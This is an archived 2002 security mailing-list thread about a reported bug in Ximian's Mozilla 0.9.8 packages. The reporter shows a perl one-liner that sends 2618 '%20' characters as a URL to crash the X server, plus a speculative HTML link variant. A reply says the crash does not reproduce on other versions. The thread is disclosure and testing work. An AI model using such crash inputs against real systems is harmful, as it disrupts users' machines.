Re: Ximian Mozilla: The 2618 Bug

From: NyQuist (NyQuistat_private)
Date: Sun Feb 17 2002 - 17:00:56 PST

Next message: overclocking_a_la_abuelaat_private: "Re: Firewall-1 and ISA D.o.S."

Previous message: Lincoln Yeoh: "Re: Firewall-1 and ISA D.o.S."
In reply to: NyQuist: "Re: Ximian Mozilla: The 2618 Bug"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Sun, 2002-02-17 at 17:48, NyQuist wrote:
> On Sun, 2002-02-17 at 16:24, Replugge [Rod] wrote:
> > NOTE TO THE MODERATOR: This was sent yesterday but i guess didn't
> > make it since this doesn't seem to affect a redhat itself, it affects
> > the mozilla packages distrbuted by Ximian:
> > 
> > The test system look like:
> > 
> > bash#~ rpm -qa | grep mozilla
> > mozilla-0.9.8-1.ximian.2
> > mozilla-mail-0.9.8-1.ximian.2
> > mozilla-xmlterm-0.9.8-1.ximian.2
> > mozilla-devel-0.9.8-1.ximian.2
> > nautilus-mozilla-1.0.6-ximian.4
> > mozilla-psm-0.9.8-1.ximian.2
> > kdebindings-kmozilla-2.1.1-1
> > 
> > This was tested in both RH7.1 and 7.2 with Ximian Gnome.(with all the
> > the updates).
> > 
> > 
> > There is a bug in mozilla 0.9.8-1 which allows you
> > to Crash the X server.
> > 
> > I won't go into details I'll just show the proof
> > of concept.
> > 
> > 
> > exploit:
> > 
> > Local:
> > bash#~ mozilla `perl -e "print '%20' x 2618"`
> > 
> > 
> > Remote:
> > I haven't test this but i guess:
> > 
> > echo "<a href=http://`perl -e "print '%20' x 2618"`>attack_me</a>" >>
> > ./attack.html
> > 
> > perhaps using "img src" or java script...
> > 
> > 
> > Best Regards
> > 
> > -- 
> > /* 
> > Rodrigo Gutierrez                   <rodrigoat_private>
> > Trustix AS                         http://www.trustix.com 
> > */
> > 
> One one box: rpm -qa | grep mozilla
> mozilla-chat-0.9.7-1
> mozilla-mail-0.9.7-1
> nautilus-mozilla-1.0.6-ximian.6
> mozilla-0.9.7-1
> mozilla-devel-0.9.7-1
> mozilla-js-debugger-0.9.7-1
> mozilla-psm-0.9.7-1
> mozilla-dom-inspector-0.9.7-1
> 
> Results in "www.perl -e "print %20 x 2618".com could not be found (lol)
> perl -e "print '%20' x 2618" prints %20 (2618 times) and doesn't
> overflow perl.
> 
> On other box: rpm -qa | grep mozilla
> nautilus-mozilla-1.0.6-ximian.6
> mozilla-psm-0.9.8-2
> mozilla-0.9.8-2
> mozilla-devel-0.9.8-2
> 
> Results in same 'not found' error.
> 
> The attack.html (as per your script) results in "www.'perl not found".
> So if it does crash your X, it wasn't present in 0.9.7-1 and is fixed in
> 0.9.8-2.
>
Oops, did miss the `' thing :)
But even with the right switch `perl - "print '%20' x 2618"` just brings
up an empty error box with mozilla-0.9.8-2. Galeon actually shows the
url (%20 2618 times), and i've tried x 5000 just to see if it overflows.
> -- 
> NyQuist | Matthew Hall -- NyQuist at ntlworld dot com 
> Sig: Microsoft sells you Windows. Linux gives you the whole house.
>

Next message: overclocking_a_la_abuelaat_private: "Re: Firewall-1 and ISA D.o.S."
Previous message: Lincoln Yeoh: "Re: Firewall-1 and ISA D.o.S."
In reply to: NyQuist: "Re: Ximian Mozilla: The 2618 Bug"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Feb 17 2002 - 20:42:45 PST